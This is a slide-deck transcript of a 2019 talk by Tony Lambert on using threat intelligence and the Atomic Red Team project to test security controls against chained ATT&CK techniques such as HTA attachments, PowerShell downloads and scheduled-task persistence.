Upgrade to Pro — share decks privately, control downloads, hide ads and more …

Intelligence Driven Testing with Atomic Red Team

Intelligence Driven Testing with Atomic Red Team

Time is short, resources are spread thin, and you have the responsibility to ensure your security investments deliver on their promises. Intelligence-driven testing shows how you can prove your controls work against real-world adversary techniques by consuming information and about adversaries and adapting tests for use from the freely-available Atomic Red Team project.

Tony M Lambert

April 13, 2019
Tweet

More Decks by Tony M Lambert

Other Decks in Technology

Transcript

  1. Detection & analysis at Red Canary Recovering sysadmin Loves to

    teach, hates to grade homework Tony Lambert Evil Finder Red Canary @ForensicITGuy $env:UserName
  2. ▪ Where are you in control testing? ▪ Problems in

    testing methodology ▪ A better way to test ▪ Atomic Red Team Overview
  3. ▪ Adversary Simulation ▪ Red Teams ▪ Penetration Testing ▪

    Blue Team Maintaining Controls Places in Testing
  4. ▪ Not everyone can afford simulations ▪ Some do compliance

    only ▪ Testing without money to test ▪ Do you improve between tests? Where Are You?
  5. ▪ Baseline current controls ◦ Simpler is better ▪ Construct

    a chain of adversary behavior ◦ Start with phishing ▪ Inspect your controls ▪ Improve coverage and configurations A Better Way
  6. Make it real Start simple with phishing Chain of Behavior

    HTA Email Attachment (T1170) PowerShell to Download Something (T1086) Scheduled Task for Persistence (T1053)
  7. What worked or didn’t? Inspect Controls ▪ HTA Attachment ◦

    Email, AV, Endpoint Monitoring ▪ PowerShell Download ◦ Endpoint Logging ▪ Scheduled Task ◦ Hunts for persistence ◦ Windows Event Logs
  8. ▪ Coverage ◦ Artifacts or hosts ▪ Configuration ◦ Did

    you think you’d catch it? ◦ Opportunity to fix things Improve
  9. ▪ Articles with adversary techniques ◦ Cybereason, Unit 42, ESET

    ▪ Visit MITRE ATT&CK ▪ Pivot to Atomic Red Team Start With Intelligence
  10. ▪ Execution Framework ◦ There’s a wizard for that! ▪

    Chain Reactions ◦ Simulate a specific attack The Fancy Stuff